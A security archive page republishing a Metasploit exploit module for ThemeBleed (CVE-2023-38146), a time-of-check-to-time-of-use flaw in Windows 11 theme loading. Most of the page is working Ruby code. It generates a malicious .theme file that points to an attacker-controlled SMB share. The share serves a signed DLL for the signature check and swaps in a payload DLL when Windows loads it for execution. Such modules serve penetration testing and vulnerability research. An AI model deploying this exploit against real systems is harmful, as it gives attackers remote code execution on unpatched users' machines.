what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Themebleed Windows 11 Themes Arbitrary Code Execution

Themebleed Windows 11 Themes Arbitrary Code Execution
Posted Jan 5, 2024
Authored by Spencer McIntyre, bwatters-r7, gabe_k | Site metasploit.com

When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the msstyles file, and if that file's PACKME_VERSION is 999, it then attempts to load an accompanying dll file ending in _vrf.dll. Before loading that file, it verifies that the file is signed. It does this by opening the file for reading and verifying the signature before opening the file for execution. Because this action is performed in two discrete operations, it opens the procedure for a time of check to time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name when the host intends to load/execute the dll.

tags | exploit
systems | windows
advisories | CVE-2023-38146
SHA-256 | 44f044cbc901c8010a0b6712cedc87c1cc39134506044dd22466b8aac564f4b8

Themebleed Windows 11 Themes Arbitrary Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146',
'Description' => %q{
When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the
msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll
file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. It does this by
opening the file for reading and verifying the signature before opening the file for execution.
Because this action is performed in two discrete operations, it opens the procedure for a time of check to
time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can
serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name
when the host intends to load/execute the dll.
},
'DisclosureDate' => '2023-09-13',
'Author' => [
'gabe_k', # Discovery/PoC
'bwatters-r7', # msf exploit
'Spencer McIntyre' # msf exploit
],
'References' => [
['CVE', '2023-38146'],
['URL', 'https://exploits.forsale/themebleed/'],
['URL', 'https://github.com/gabe-k/themebleed/tree/main']

],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X64,
'Targets' => [
[ 'Windows', {} ],
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
'AKA' => ['ThemeBleed']

},
'DefaultOptions' => { 'DisablePayloadHandler' => false }
)
)

register_options([
OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
])

deregister_options(
'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity
'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity
'FOLDER_NAME'
)
end

def file_format_filename
datastore['THEME_FILE_NAME']
end

def setup
super

@file = File.binread(datastore['STYLE_FILE'])
begin
pe = Rex::PeParsey::Pe.new_from_string(@file)
rescue Rex::PeParsey::PeError => e
fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}")
end

unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva)
fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.')
end
@file_version_offset = pe.rva_to_file_offset(rva)

@file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME']
@file_name << '.msstyles' unless @file_name.end_with?('.msstyles')
end

def primer
payload_dll = generate_payload_dll
max_length = [payload_dll.length, @file.length].max
# make sure that the lengths are the same by padding the smaller to the length of the larger
@file.ljust(max_length, "\x00".b)
payload_dll.ljust(max_length, "\x00".b)

virtual_disk = service.shares[@share]
@service = service

virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file)
virtual_disk.add(virtual_file)
# install this hook for create requests to set the thread-local file content
virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request|
next unless request.name.read_now!.encode.ends_with?('_vrf.dll')

if request.desired_access.execute == 1
virtual_file.tl_content = payload_dll
else
virtual_file.tl_content = @file
end

nil
end

file_create(make_theme)
end

def get_file_contents(client:)
print_status("Sending file to #{client.peerhost}")
new_version = [999].pack('v')
@file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...]
end

def make_theme
<<~THEME
[Theme]
DisplayName=@%SystemRoot%\\System32\\themeui.dll,-2060

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=\\\\#{datastore['SRVHOST']}\\#{@share}\\#{@file_name}
ColorStyle=NormalColor
Size=NormalSize

[MasterThemeSelector]
MTSM=RJSPBS
THEME
end

class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile
def initialize(*args, **kwargs)
super
@default_content = @content
@tl_content = {}
@tl_content.compare_by_identity
end

def open(mode = 'r', &block)
@content = tl_content
super
end

def tl_content=(content)
@tl_content[Thread.current] = content
end

def tl_content
@tl_content.fetch(Thread.current, @default_content)
end
end
end
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close